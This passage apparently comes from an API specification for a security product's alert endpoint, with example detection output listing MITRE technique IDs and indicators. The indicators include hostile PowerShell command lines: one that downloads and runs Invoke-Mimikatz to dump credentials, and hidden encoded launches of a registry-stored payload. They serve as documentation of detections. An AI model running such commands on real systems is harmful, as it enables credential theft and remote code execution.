                                  "V9.T1003.001",
                                  "V9.T1059.003",
                                  "V9.T1212"
                                ],
                                "matchedEvents": [
                                  {
                                    "uuid": "e168a6e5-27b1-462b-ad3e-5146df4e6aa5",
                                    "matchedDateTime": "2022-09-05T03:53:57.199Z",
                                    "type": "TELEMETRY_PROCESS"
                                  }
                                ]
                              }
                            ]
                          }
                        ],
                        "indicators": [
                          {
                            "id": 1,
                            "type": "command_line",
                            "field": "objectCmd",
                            "value": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe \"iex (new-object net.webclient).downloadstring(\" \"https://raw.githubusercontent.com/mattifestation/powersploit/master/exfiltration/invoke-mimikatz.ps1); invoke-mimikatz -dumpcreds\"",
                            "relatedEntities": [
                              "35FA11DA-A24E-40CF-8B56-BAF8828CC15E"
                            ],
                            "filterIds": [
                              "49d327c4-361f-43f0-b66c-cab433495e42"
                            ],
                            "provenance": [
                              "Alert"
                            ]
                          },
                          {
                            "id": 2,
                            "type": "command_line",
                            "field": "processCmd",
                            "value": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe -nop -noni -w hidden -enc ......aakaakaekavgaracqaswapackafabjaeuawaa=",
                            "relatedEntities": [
                              "35FA11DA-A24E-40CF-8B56-BAF8828CC15E"
                            ],
                            "filterIds": [
                              "49d327c4-361f-43f0-b66c-cab433495e42"
                            ],
                            "provenance": [
                              "Alert"
                            ]
                          },
                          {
                            "id": 3,
                            "type": "command_line",
                            "field": "parentCmd",
                            "value": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe -nop -noni -w hidden -c $x=$((gp hkcu:software\\microsoft\\windows update).update); powershell -nop -noni -w hidden -enc $x",
                            "relatedEntities": [
                              "35FA11DA-A24E-40CF-8B56-BAF8828CC15E"
                            ],
                            "filterIds": [
                              "49d327c4-361f-43f0-b66c-cab433495e42"
                            ],
                            "provenance": [
                              "Alert"
                            ]
                          },
                          {
                            "id": 4,
                            "type": "file_sha1",
                            "field": "objectFileHashSha1",
                            "value": "1B3B40FBC889FD4C645CC12C85D0805AC36BA254",
                            "relatedEntities": [
                              "35FA11DA-A24E-40CF-8B56-BAF8828CC15E"
                            ],
                            "filterIds": [
                              "49d327c4-361f-43f0-b66c-cab433495e42"
                            ],
                            "provenance": [
                              "Alert"
                            ]
                          },
                          {
                            "id": 5,
                            "type": "fullpath",
                            "field": "objectFilePath",
                            "value": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe",
                            "relatedEntities": [
                              "35FA11DA-A24E-40CF-8B56-BAF8828CC15E"
                            ],
                            "filterIds": [
                              "49d327c4-361f-43f0-b66c-cab433495e42"
                            ],
                            "provenance": [
                              "Alert"
                            ]
                          },
                          {
                            "id": 6,
                            "type": "fullpath",
                            "field": "processFilePath",
                            "value": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe",
                            "relatedEntities": [
                              "35FA11DA-A24E-40CF-8B56-BAF8828CC15E"
                            ],
                            "filterIds": [
                              "49d327c4-361f-43f0-b66c-cab433495e42"
                            ],
                            "provenance": [
                              "Alert"
                            ]
                          },
                          {
                            "id": 7,
                            "type": "text",
                            "field": "endpointHostName",
                            "value": "Nimda",
                            "relatedEntities": [
                              "35FA11DA-A24E-40CF-8B56-BAF8828CC15E"
                            ],
                            "filterIds": [
                              "49d327c4-361f-43f0-b66c-cab433495e42"
                            ],
                            "provenance": [
                              "Alert"
                            ]
                          }
                        ]
                      }
                    ]
                  }
                }
              }
            }
          },
          "400": {
            "description": "Bad request",
            "content": {
              "application/json": {
                "schema": {
                  "required": [
                    "error"
                  ],
                  "properties": {
                    "error": {
                      "type": "object",
                      "description": "* 3090003 - Unable to process the request. Verify that the request is properly formatted and try again. (Error code: 3090003)\n",
                      "required": [
                        "code",
                        "message"
                      ],
                      "properties": {
                        "code": {
                          "type": "string",
                          "enum": [
                            "BadRequest"
                          ],
                          "example": "BadRequest"
                        },
                        "message": {
                          "type": "string",
                          "example": "Unable to process the request. Verify that the request is properly formatted and try again. (Error code: 3090003)"
                        },
                        "number": {
                          "type": "integer",
                          "enum": [
[...]
